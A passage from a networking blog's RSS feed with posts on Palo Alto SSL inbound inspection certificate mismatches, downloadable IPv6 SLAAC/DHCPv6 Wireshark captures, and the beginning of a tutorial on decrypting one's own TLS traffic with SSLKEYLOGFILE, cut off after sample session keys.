<p>The <code>show counter global</code> revealed some <code>ssl_inbound_cert_mismatch</code> hits:</p><pre class="urvanov-syntax-highlighter-plain-tag">ssl_inbound_cert_mismatch                 70        0 error     ssl       pktproc   No matching server certificate found in config</pre><p>
which exactly aligns with the hit count on the decryption policy:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-03-Decryption-Policy.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14349" src="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-03-Decryption-Policy-1024x194.png" alt="" width="604" height="114" srcset="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-03-Decryption-Policy-1024x194.png 1024w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-03-Decryption-Policy-300x57.png 300w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-03-Decryption-Policy-768x146.png 768w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-03-Decryption-Policy-1536x291.png 1536w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-03-Decryption-Policy-2048x388.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p><a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA1Ki000000sY1zKAE" target="_blank" rel="noopener">This KB article from PANW</a> gives some details about that behaviour:</p>
<div class="su-quote su-quote-style-default"><div class="su-quote-inner su-u-clearfix su-u-trim">When a server sends a ServerHello message, the firewall captures the certificate&#8217;s MD5 fingerprint.</p>
<p>It compares this fingerprint against the one stored in your local SSL Inbound Inspection rule.</p>
<p>If the fingerprints do not match, the firewall immediately kills the session and logs the error: Server and Firewall&#8217;s certificate mismatch.</div></div>
<p>For whatever reason, I&#8217;m seeing a different error message. Anyway, that&#8217;s the root cause here. <strong>AFAIK, it should be possible to do this TLS interception regardless of the exact certificate being present. Hence, I suppose that it&#8217;s a limit by design.</strong></p>
<p>Any comments? ;)</p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@robert_clark?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Robert Clark</a> on <a href="https://unsplash.com/photos/a-large-group-of-purple-and-yellow-bullet-caps-bw8iOoOzjc0?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/palo-alto-networks-ngfw-ssl-inbound-inspection-with-different-certificate/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14337</post-id>	</item>
		<item>
		<title>Basic IPv6 Messages (v2): Wireshark Captures</title>
		<link>https://weberblog.net/basic-ipv6-messages-v2-wireshark-captures/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=basic-ipv6-messages-v2-wireshark-captures</link>
					<comments>https://weberblog.net/basic-ipv6-messages-v2-wireshark-captures/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Thu, 23 Apr 2026 19:49:02 +0000</pubDate>
				<category><![CDATA[IPv6]]></category>
		<category><![CDATA[Memorandum]]></category>
		<category><![CDATA[Coloring Rules]]></category>
		<category><![CDATA[DHCPv6]]></category>
		<category><![CDATA[Dual-Stack]]></category>
		<category><![CDATA[IPv6 Duplicate Address Detection]]></category>
		<category><![CDATA[Neighbor Discovery]]></category>
		<category><![CDATA[pcap]]></category>
		<category><![CDATA[ProfiShark]]></category>
		<category><![CDATA[Router Advertisement]]></category>
		<category><![CDATA[Ultimate PCAP]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Wireshark]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=12509</guid>

					<description><![CDATA[<img width="300" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-300x150.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-300x150.jpg 300w, https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-1024x513.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-768x384.jpg 768w, https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-1536x769.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />In my IPv6 classes, I always teach the basic IPv6 messages as seen on the wire. There&#8217;s so much new stuff, such as Router Advertisements, Duplicate Address Detections, Neighbour Solicitations, and so on. Therefore, I&#8217;m using a rather simple packet capture showing the starting process of a client getting its addresses. For the last 10 years, &#8230; <a href="https://weberblog.net/basic-ipv6-messages-v2-wireshark-captures/" class="more-link">Continue reading <span class="screen-reader-text">Basic IPv6 Messages (v2): Wireshark Captures</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-300x150.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-300x150.jpg 300w, https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-1024x513.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-768x384.jpg 768w, https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image-1536x769.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Wireshark-Capture-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>In my IPv6 classes, I always teach<strong> the basic IPv6 messages as seen on the wire</strong>. There&#8217;s so much new stuff, such as Router Advertisements, Duplicate Address Detections, Neighbour Solicitations, and so on. Therefore, I&#8217;m using a rather <strong>simple packet capture showing the starting process of a client getting its addresses</strong>.</p>
<p>For the last 10 years, I used <a href="https://weberblog.net/basic-ipv6-messages-wireshark-capture/">this capture</a>, which I took on a Knoppix Linux along with a German Speedport router, in which SLAAC was used for getting the addresses. However, it turned out that in enterprise-grade networks, <strong>stateful DHCPv6</strong> is used more commonly. Hence, I did it again and captured the very first IPv6 messages as seen on an IPv6 node, but this time on a Windows 11 PC and a Debian 13, along with stateful DHCPv6.</p>
<p><span id="more-12509"></span></p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">Note that this post is one of many related to IPv6. <a href="https://weberblog.net/ipv6/">Click here for a structured list</a>.</div></div>
<h2>The Packet Captures</h2>
<p>My testbed consists of the following components:</p>
<ul>
<li><strong>Windows 11 Version 25H2</strong> (Build 26200.7462)</li>
<li>Raspberry Pi 3 with <strong>Debian GNU/Linux 13 (trixie)</strong>, <strong>Kernel 6.12.62</strong>+rpt-rpi-v8</li>
<li>Palo Alto Networks firewall PA-440 with PAN-OS 11.1.10-h10 as the layer 3 gateway and <strong>DHCPv6 relay</strong></li>
<li>Infoblox Grid with NIOS 9.0.7, acting as the DHCPv6 server to which the Palo relays. The GUA addresses <code>2a00:6020:ad0b:83::/48</code> are out of a residential ISP connection (<a href="https://weberblog.net/verbindungsaufbau-deutsche-glasfaser/">Deutsche Glasfaser</a>) here in Germany. RFC 1918 for legacy IP. (<a href="https://weberblog.net/stateful-dhcpv6-capture-along-with-relaying/">Details about DHCPv6 relaying are here.</a>)</li>
</ul>
<p>To avoid unnecessary packets, only those clients were present on this VLAN. I <strong>captured with a real TAP</strong>, the <a href="https://weberblog.net/my-network-companion-the-profishark/"><strong>ProfiShark</strong></a>, in between the switch (port A) and the clients (port B), starting *before* the LAN cables were plugged in.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<p>I did those captures with the <strong>Windows</strong> machine (was powered up, but I plugged in and out the network cable), and then with the the <strong>Ubuntu</strong> machine, which I booted up and shut down. In both cases, I also did the following simple tasks to have some upper-layer packets in there.:</p>
<ul>
<li><code>ping -c 4 -6 weberblog.net</code></li>
<li><code>ping -c 4 -4 weberblog.net</code></li>
<li><code>nslookup/host securityasapodcast.de</code></li>
<li><code>firefox/lynx http://ip.webernetz.net</code></li>
<li><code>firefox/lynx https://ip-only.webernetz.net</code></li>
</ul>
<p>Here are the capture files. <strong>Feel free to download and use them for whatever you need</strong>. (Please link back to this post if used. Thanks.) Those *.pcapng.gz files can be opened directly in Wireshark. And, of course, those packets are part of the <a href="https://weberblog.net/the-ultimate-pcap/">Ultimate PCAP</a>.</p>
<p style="text-align: center;"><a href="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-DHCPv6-Windows.pcapng.gz">&#8211;&gt; IPv6 Address Assignment <strong>DHCPv6 Windows</strong>.pcapng.gz &lt;&#8211;</a><br />
<a href="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-DHCPv6-Linux.pcapng.gz">&#8211;&gt; IPv6 Address Assignment <strong>DHCPv6 Linux</strong>.pcapng.gz &lt;&#8211;</a></p>
<p>And since I was on it anyway, I did some new captures for the classical <strong>SLAAC address assignment</strong>, too. That is: RA with prefix information along with the RDNSS option:</p>
<p style="text-align: center;"><a href="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-SLAAC-Windows.pcapng.gz">&#8211;&gt; IPv6 Address Assignment <strong>SLAAC Windows</strong>.pcapng.gz &lt;&#8211;</a><br />
<a href="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-SLAAC-Linux.pcapng.gz">&#8211;&gt; IPv6 Address Assignment <strong>SLAAC Linux</strong>.pcapng.gz &lt;&#8211;</a></p>
<p>Packets you can find within those trace files:</p>
<ul>
<li><strong>Router Solicitations</strong> aka ICMPv6 type 133</li>
<li><strong>Router Advertisements</strong> aka ICMPv6 type 134 (M-flag set, no prefix; respectively prefix information and A-flag)</li>
<li><strong>Duplicate Address Detection (DAD)</strong> aka ICMPv6 type 135, sent from the unspecified address <code>::</code></li>
<li>Neighbour Solicitation &amp; Advertisement, types 135 and 136</li>
<li>Multicast Listener stuff</li>
<li><strong>Stateful DHCPv6</strong> (via relay on the Palo, only on the DHCPv6 captures)</li>
<li>DNS queries</li>
<li>Ping aka ICMP/ICMPv6 echo-request and echo-reply</li>
<li>DHCP for legacy IP</li>
<li>ARP for legacy IP</li>
</ul>
<h2>Wiresharking IPv6 &#8211;&gt; Coloring Rules</h2>
<p>Please note that I&#8217;m heavily relying on <strong>colouring rules in order to distinguish all those ICMPv6-based neighbour discovery protocol (NDP) messages, which are: RS/RA, NS/NA, and DAD</strong>. Furthermore, the MLD messages, which are not really of interest, are kind of hidden, since I am using a rule of green foreground with white background for them. Refer to these first four lines:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-14383" src="https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6.png" alt="" width="873" height="470" srcset="https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6.png 873w, https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-300x162.png 300w, https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-768x413.png 768w" sizes="auto, (max-width: 873px) 100vw, 873px" /></a></p>
<p>Here&#8217;s a side-by-side comparison of the *same* packets without (left) and with (right) my colouring rules:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-side-by-side-comparison.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14384" src="https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-side-by-side-comparison-1024x365.png" alt="" width="604" height="215" srcset="https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-side-by-side-comparison-1024x365.png 1024w, https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-side-by-side-comparison-300x107.png 300w, https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-side-by-side-comparison-768x274.png 768w, https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-side-by-side-comparison-1536x547.png 1536w, https://weberblog.net/wp-content/uploads/2026/05/Wireshark-Coloring-Rules-for-IPv6-ICMPv6-side-by-side-comparison-2048x730.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<h2>Looking at the Startup Process</h2>
<p>Since a picture is worth a thousand words, here are some of the bootup process from Windows with DHCPv6:</p>

<a href='https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-1-Router-Solicitation.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-1-Router-Solicitation-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-2-Router-Advertisement.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-2-Router-Advertisement-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-3-DHCPv6.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-3-DHCPv6-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-4-DHCPv6-Advertise.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-4-DHCPv6-Advertise-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-5-Duplicate-Address-Detection.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-5-Duplicate-Address-Detection-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-6-Neighbor-Solicitations-and-Advertisements.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-6-Neighbor-Solicitations-and-Advertisements-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-7-Upper-Layer-Traffic.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/Basic-IPv6-Messages-v2-Windows-DHCPv6-7-Upper-Layer-Traffic-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>

<div style="margin-bottom:24px"><a href="https://weberblog.net/packetlion-aggregation-packet-broker" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketLion.1208x232.webp" /></a></div>
<h2>Some Notes</h2>
<ul>
<li><strong>Neither operating system sends Duplicate Address Detection messages for its link-local addresses</strong>, but only for their GUAs. Even though I plugged in the network cable again and again, that is, the capture process always started at the very beginning of the NIC being live on the network. Is this a current best practice I&#8217;m not aware of?</li>
<li><strong>Windows *always* sends DHCPv6 SOLICIT messages</strong>, even if the RA does not have the M-flag set, or even if no RA was received at all. Be careful in situations where both SLAAC and M-flag are used! (Not recommended anyway.)</li>
<li>Quite interesting is the <strong>Internet Protocol that Windows/Linux are using for querying the recursive DNS server</strong>:
<ul>
<li>SLAAC with RDNSS: Windows IPv4 🟡, Linux IPv4 🟡</li>
<li>Stateful DHCPv6: Windows IPv6 ✅, Linux still IPv4 ❌ (WHY?!?!?)</li>
<li>That is: Within Dual-Stack environments, IPv6 is not used for reaching the recursive DNS server in many situations. I would have expected it to behave differently. At least for the stateful DHCPv6 part, IPv6 should be used to reach the RDNS. Maybe the stub resolver on my Linux machine behaves differently? Or is it related to latency?</li>
</ul>
</li>
<li>Windows does not send any Multicast Listener Reports at all. Linux does. (I don&#8217;t see any advantages of those MLDs anyway, since almost all layer 2 switches I know don&#8217;t leverage multicast snooping by default.)</li>
<li>When you move a Windows PC into a new Layer 3 network, it initially assumes it is still in the previous one. You can see this as it requests the old IPv4 address via DHCP or tries to use the old IPv6 addresses via NDP. To make matters more complicated, in my two test VLANs, the Palo Alto Networks firewall (default gateway) always uses the exact same IPv6 link-local address, <code>fe80::3efa:30ff:fe04:9114</code>.</li>
<li>I omitted many other chatty packets that were sent during the first seconds of a connected network, e.g.: NTP, LLMNR, NBNS, MDNS, IGMP, SSDP. Those are all sent for various reasons (that I don&#8217;t know) from Windows. That is: While my proposed PCAPs show all packets relevant to IPv6 and legacy IP address assignment, it does NOT show all possible name resolution and network reconnaissance attempts from Windows itself.</li>
</ul>
<p>For the sake of completeness, here are some screenshots of how I set up the layer 3 interfaces on the Palo. (Note that I initially configured a third testbed with &#8220;stateless DHCPv6&#8221;, hence the O-flag. But since this is not a relevant scenario anymore, as all major operating systems have RDNSS implemented, I did not follow up on those captures.)</p>

<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-01-Interfaces.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-01-Interfaces-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-02-SLAAC.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-02-SLAAC-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-03-SLAAC.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-03-SLAAC-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-04-SLAAC.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-04-SLAAC-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-05-SLAAC.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-05-SLAAC-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-06-DHCPv6.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-06-DHCPv6-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-07-DHCPv6.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-07-DHCPv6-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-08-DHCPv6.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-08-DHCPv6-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-09-DHCP-Relay.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2026/05/IPv6-Address-Assignment-Palo-09-DHCP-Relay-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>

<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@dtopkin1?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Dayne Topkin</a> on <a href="https://unsplash.com/photos/macbook-pro-on-white-table-y5_mFlLMwJk?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/basic-ipv6-messages-v2-wireshark-captures/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">12509</post-id>	</item>
		<item>
		<title>Decrypting TLS with Wireshark</title>
		<link>https://weberblog.net/decrypting-tls-with-wireshark/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=decrypting-tls-with-wireshark</link>
					<comments>https://weberblog.net/decrypting-tls-with-wireshark/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Mon, 13 Apr 2026 11:09:15 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[TLS]]></category>
		<category><![CDATA[Tutorial/Howto]]></category>
		<category><![CDATA[Wireshark]]></category>
		<category><![CDATA[Decrypted]]></category>
		<category><![CDATA[Follow HTTP Stream]]></category>
		<category><![CDATA[Follow TCP Stream]]></category>
		<category><![CDATA[Follow TLS Stream]]></category>
		<category><![CDATA[HTTPS]]></category>
		<category><![CDATA[Ultimate PCAP]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14278</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />Did you know that you can easily decrypt TLS (mostly HTTPS) traffic with Wireshark? Well, only if you have the keys. ;) This really is a game-changer if you&#8217;re stuck with troubleshooting encrypted data. Let&#8217;s do an example: The server&#8217;s private key (certificate) is no longer of interest, since all modern ciphers use (EC)DHE, in &#8230; <a href="https://weberblog.net/decrypting-tls-with-wireshark/" class="more-link">Continue reading <span class="screen-reader-text">Decrypting TLS with Wireshark</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>Did you know that you can easily <strong>decrypt TLS (mostly HTTPS) traffic with Wireshark</strong>? Well, only if you have the keys. ;) This really is a game-changer if you&#8217;re stuck with troubleshooting encrypted data. Let&#8217;s do an example:</p>
<p><span id="more-14278"></span></p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">TL;DR: You can decrypt TLS traffic with Wireshark, but only <strong>if you have the session keys</strong>! Those can be exported by browsers if you set the SSLKEYLOGFILE environment variable *before* using the browser.</div></div>
<p>The server&#8217;s private key (certificate) is no longer of interest, since all modern ciphers use (EC)DHE, in which the session keys are derived by both parties. With TLS 1.3, RSA key exchange is gone completely. All ciphers use forward secrecy.</p>
<h2>Getting the Session Keys</h2>
<p>In this example, I&#8217;m using a browser with HTTPS. Of course, you can decrypt any other TLS traffic with Wireshark, as long as you have the session keys. However, in most of my daily business scenarios, decrypting HTTPS is the most relevant.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<p><strong>You have to set the SSLKEYLOGFILE variable, which then creates a file with the session keys.</strong> No admin privileges are needed for this step. After that, open your browser of choice and start surfing. In my example, I opened my fairly simple website at<a href="https://ip.webernetz.net" target="_blank" rel="noopener"> https://ip.webernetz.ne</a>t.</p><pre class="urvanov-syntax-highlighter-plain-tag">set SSLKEYLOGFILE=%USERPROFILE%\sslkeys.log
start firefox</pre><p>
(For some reason, various variables/fields are still named &#8220;SSL&#8221; rather than &#8220;TLS&#8221;.)</p>
<p>At the start of the browser, many different HTTPS sessions are already initiated by the browser itself. That is: The sslkeys.log is kind of crowded. Be aware that it contains any session keys since your start. Keep them to yourself!</p>
<p>In my sample, I copied only the relevant session keys for my single session. Those can be <strong>correlated by the &#8220;Random&#8221; value within the client TLS hello</strong>, field 
			<span id="urvanov-syntax-highlighter-6a78d868a341d498755253" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">tls.handshake.random</span></span> in Wireshark. Different lines are present in the file, such as CLIENT_HANDSHAKE_TRAFFIC_SECRET, SERVER_HANDSHAKE_TRAFFIC_SECRET, CLIENT_TRAFFIC_SECRET_0, SERVER_TRAFFIC_SECRET_0, EXPORTER_SECRET. My sample keys are:</p><pre class="urvanov-syntax-highlighter-plain-tag">CLIENT_HANDSHAKE_TRAFFIC_SECRET 24a0ba3ed6a030ec8e3dfaaf467fedf990caa19957f92d05a2a424a8a7ec0373 afd7382d4e2250b87110fea5381e69e557d4203aab16992d4b79c2b3a54bb6a4
SERVER_HANDSHAKE_TRAFFIC_SECRET 24a0ba3ed6a030ec8e3dfaaf467fedf990caa19957f92d05a2a424a8a7ec0373 7d4920ba247e0ce9eb43bd5f2bede6e015711131fc2a943e578a8ce260f38579
